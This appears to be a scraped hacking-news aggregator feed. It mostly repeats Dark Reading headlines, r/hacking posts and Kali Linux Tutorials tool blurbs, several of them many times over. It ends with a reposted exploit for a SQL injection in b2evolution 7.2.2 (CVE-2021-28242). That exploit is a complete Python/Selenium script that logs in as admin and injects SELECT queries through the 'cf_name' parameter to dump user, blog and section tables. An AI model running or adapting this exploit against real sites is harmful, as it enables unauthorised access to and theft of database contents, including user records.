Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Black Hat Asia Speakers Share Secrets About Sandboxes, Smart Doors, and Security
Find video interviews with some of the coolest Black Hat Asia experts right here, as part of the Dark Reading News Desk this week.
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Asia Speakers Share Secrets About Sandboxes, Smart Doors, and Security
Find video interviews with some of the coolest Black Hat Asia experts right here, as part of the Dark Reading News Desk this week.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Black Hat Asia Speakers Share Secrets About Sandboxes, Smart Doors, and Security
Find video interviews with some of the coolest Black Hat Asia experts right here, as part of the Dark Reading News Desk this week.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Cloud-Native Businesses Struggle with Security
More companies moved to cloud-native infrastructure in the past year, and security incidents and malware moved right along with them.
___________________________
@hacking_Attack
@Hacking_Video
Cloud-Native Businesses Struggle with Security
More companies moved to cloud-native infrastructure in the past year, and security incidents and malware moved right along with them.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Securing the Internet of Things in the Age of Quantum Computing
Internet security, privacy, and authentication aren't new issues, but IoT presents unique security challenges.
Securing the Internet of Things in the Age of Quantum Computing
Internet security, privacy, and authentication aren't new issues, but IoT presents unique security challenges.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Found a cool electronic playlist for hackers to get to work
https://open.spotify.com/playlist/0f6lIWsTwrgmt08NxKv0wl?si=b78c8a9b3e314ea6
submitted by /u/technojules
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Found a cool electronic playlist for hackers to get to work
https://open.spotify.com/playlist/0f6lIWsTwrgmt08NxKv0wl?si=b78c8a9b3e314ea6
submitted by /u/technojules
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Found a cool electronic playlist for hackers to get to work
[https://open.spotify.com/playlist/0f6lIWsTwrgmt08NxKv0wl?si=b78c8a9b3e314ea6](https://open.spotify.com/playlist/0f6lIWsTwrgmt08NxKv0wl?si=b78c8a9b...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
We Are Data - MOVIE containing quite some philosophy for hackers
https://external-preview.redd.it/bb2GQg6OESWcA6HMbo7g3kJrR8lB1gbi9791gZm15sc.jpg?width=640&crop=smart&auto=webp&s=42ffb571ffd0ff431b907baf84d1ccac8d147089 submitted by /u/Viracucha
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
We Are Data - MOVIE containing quite some philosophy for hackers
https://external-preview.redd.it/bb2GQg6OESWcA6HMbo7g3kJrR8lB1gbi9791gZm15sc.jpg?width=640&crop=smart&auto=webp&s=42ffb571ffd0ff431b907baf84d1ccac8d147089 submitted by /u/Viracucha
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
We Are Data - MOVIE containing quite some philosophy for hackers
Posted in r/hacking by u/Viracucha • 396 points and 9 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Researchers peek at proprietary data of US particle physics lab Fermilab
https://external-preview.redd.it/NaukPe4FTuL--jSH7ADLBuRGqNwlFEy0Fz0doVa4P2s.jpg?width=640&crop=smart&auto=webp&s=d52ff1c231adb00bbee323d7de03fe5b0ee7b3d7 submitted by /u/planetxort
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Researchers peek at proprietary data of US particle physics lab Fermilab
https://external-preview.redd.it/NaukPe4FTuL--jSH7ADLBuRGqNwlFEy0Fz0doVa4P2s.jpg?width=640&crop=smart&auto=webp&s=d52ff1c231adb00bbee323d7de03fe5b0ee7b3d7 submitted by /u/planetxort
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Researchers peek at proprietary data of US particle physics lab...
Posted in r/hacking by u/planetxort • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Posta : Cross-document Messaging Security Research Tool
Posta is a tool for researching Cross-document Messaging communication. It allows you to track, explore and exploit postMessage vulnerabilities, and includes features such as replaying messages sent between windows within any attached browser. Prerequisites Google Chrome / Chromium Node.js (optional) Installation Development Environment Run Posta in a full development environment with a dedicated browser (Chromium): Install Posta git clone https://github.com/benso-io/postacd postanpm install […]
The post Posta : Cross-document Messaging Security Research Tool appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Posta : Cross-document Messaging Security Research Tool
Posta is a tool for researching Cross-document Messaging communication. It allows you to track, explore and exploit postMessage vulnerabilities, and includes features such as replaying messages sent between windows within any attached browser. Prerequisites Google Chrome / Chromium Node.js (optional) Installation Development Environment Run Posta in a full development environment with a dedicated browser (Chromium): Install Posta git clone https://github.com/benso-io/postacd postanpm install […]
The post Posta : Cross-document Messaging Security Research Tool appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Posta : Cross-document Messaging Security Research Tool
Posta is a tool for researching Cross-document Messaging communication. It allows you to track, explore and exploit postMessage vulnerabilities.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Ldsview : Offline search tool for LDAP directory dumps in LDIF format
Ldsview is a offline search tool for LDAP directory dumps in LDIF format. Features Fast and memory efficient parsing of LDIF files Build ldapsearch commands to extract an LDIF from a directory Show directory structure UAC and directory time format translation Config Config options can be passed as CLI flags, environment variables, or via a config file […]
The post Ldsview : Offline search tool for LDAP directory dumps in LDIF format appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Ldsview : Offline search tool for LDAP directory dumps in LDIF format
Ldsview is a offline search tool for LDAP directory dumps in LDIF format. Features Fast and memory efficient parsing of LDIF files Build ldapsearch commands to extract an LDIF from a directory Show directory structure UAC and directory time format translation Config Config options can be passed as CLI flags, environment variables, or via a config file […]
The post Ldsview : Offline search tool for LDAP directory dumps in LDIF format appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Ldsview : Offline search tool for LDAP directory dumps in LDIF format
Offline search tool for Lightweight Directory Access Protocol (LDAP) directory dumps inLightweight Directory Interchange Format( LDIF) format.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
b2evolution 7-2-2 SQL Injection
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png b2evolution version 7-2-2 suffers from a remote SQL injection vulnerability.
MD5 |
b2evolution 7-2-2 SQL Injection
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png b2evolution version 7-2-2 suffers from a remote SQL injection vulnerability.
MD5 |
1ced09b619490337be3ea86e23221667Download # Exploit Title: b2evolution 7-2-2 obtaining sensitive database information by injecting SQL commands into the "cf_name" parameter
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.06.2021
# Vendor: https://b2evolution.net/
# Link: https://b2evolution.net/downloads/7-2-2
# CVE: CVE-2021-28242
# Proof: https://streamable.com/x51kso
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28242
from selenium import webdriver
import time
# Vendor: https://typo3.org/
website_link="
http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link
"
# enter your login username
username="admin"
# enter your login password
password="FvsDq7fmHvWF"
#enter the element for username input field
element_for_username="x"
#enter the element for password input field
element_for_password="q"
#enter the element for submit button
element_for_submit="login_action[login]"
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit vulnerability MySQL obtain sensitive database information by
injecting SQL commands into the "cf_name" parameter
time.sleep(7)
# Receaving sensitive info for evo_users
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections
"))
time.sleep(7)
# Receaving sensitive info for evo_blogs
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections
"))
time.sleep(7)
# Receaving sensitive info for evo_section
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
browser.close()
print("At the time, of the exploit, you had to see information about the
tables...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, your exploit is not working for some reasons...")
---------------------------------
# Exploit Title: b2evolution 7-2-2 obtaining sensitive database information
by injecting SQL commands into the "cf_name" parameter
# Date: 05.06.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-28242
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http: Source:packetst[...]